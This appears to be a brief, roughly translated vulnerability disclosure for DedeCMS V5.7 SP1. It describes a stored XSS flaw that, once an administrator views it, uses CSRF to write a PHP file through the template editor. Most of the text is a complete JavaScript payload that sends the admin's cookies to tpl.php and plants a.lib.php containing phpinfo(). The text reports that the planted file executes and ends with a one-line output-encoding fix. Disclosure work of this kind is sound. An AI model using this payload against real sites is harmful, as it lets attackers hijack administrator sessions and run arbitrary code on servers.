A stored xss instance in DedeCMS can be used as an administrator (csrf). getshell is successfully tested.

A stored xss instance in DedeCMS can be used as an administrator (csrf). getshell is successfully tested.
DedeCMS-V5.7-UTF8-SP1 Block Storage xss can hit the Administrator getshell successfully test registered account, then login: jscode:

function ajax(){      var request = false;      if(window.XMLHttpRequest) {          request = new XMLHttpRequest();      } else if(window.ActiveXObject) {          var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];          for(var i=0; i<versions.length; i++) {              try {                  request = new ActiveXObject(versions[i]);              } catch(e) {}          }      }      return request;  }var _x = ajax();  postgo();function postgo() {      src="http://10.65.100.235/DedeCMS-V5.7-UTF8-SP1/uploads/dede/tpl.php";      data="actiondo=edittag&action=savetagfile&filename=a.lib.php&content=%3C%3Fphp%0D%0Aphpinfo%28%29%3B%0D%0A%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";    xhr_act("POST",src,data);  }  function xhr_act(_m,_s,_a){    _x.open(_m,_s,false);cookie = document.cookie;    if(_m=="POST"){_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");_x.setRequestHeader("Cookie",cookie);}      _x.send(_a);      return _x.responseText;  }

 

In order to do the test, we create a test tag in advance, and the TAG content is blank. Then, our js Code is to write phpinfo () to a. lib. php:



Finally we went to access the DedeCMS-V5.7-UTF8-SP1/uploads/include/taglib/a. lib. php, there is no limit to directly see the phpinfo is executed Solution:Htmlcode conversion for all output parts